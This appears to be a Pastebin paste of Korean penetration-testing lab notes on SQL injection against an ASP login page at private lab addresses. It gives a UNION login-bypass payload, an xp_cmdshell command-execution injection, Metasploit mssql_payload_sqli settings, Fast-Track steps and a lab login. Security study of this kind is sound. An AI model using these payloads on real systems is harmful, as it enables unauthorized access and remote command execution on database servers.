Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 192.168.182.134/loginCheck.asp?id=aaa&password=aaa&x=38&y=47
- http://192.168.182.134/loginCheck.asp?id=raon00&password=raon0011&x=38&y=47\
- 컬럼 갯수는 2개
- union 은 두개의 table을 연결해 주는 것이므로 union 다음에 바로 select가 나온다.
- id : ' union select 1,1--
- pw : 1 (두번째 1을 적어준다)
- select id, password from " & tvlname & " where upper(id) = '" & UCase(id) & "'";
- 컬럼수 두개이고, 가상의 pw가 필요
- "cmd shell 사용여부 확인"
- a';exec master..xp_cmdshell 'mkdir c:\test';--
- 개발자 도구에서 length를 조정한다. (script는 client side 언어 이므로 client 가 값을 변경할 수 있다)
- (DOM 탐색기 --> 요소선택)을 눌러서 max length를 확장하고 싶은 값으로 변경한다.
- use exploit/windows/mssql/mssql_payload_sqli 사용법
- set rhost 192.168.140.134
- set method post
- set get_path loginCheck.asp (취약한 페이지)
- set data id=[SQLi]&password=aa&x=38&y=47 (공격 코드를 [SQLi] 에 담아 줄께 라는 의미, 취약한 인자를 찾았으면..)
- meta에서는 실패
- FAST-TRACK 이란 툴로 한다.
- 4(mssql)선택 - 1번 (sql injector) - 1번 (query string....)
- http://192.168.182.134/loginCheck.asp?id='INJECTHERE&password=aa&x=38&y=47
- sql injector - post 를 선택하면 http://192.168.182.134 까지만 넣어주면 된다.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement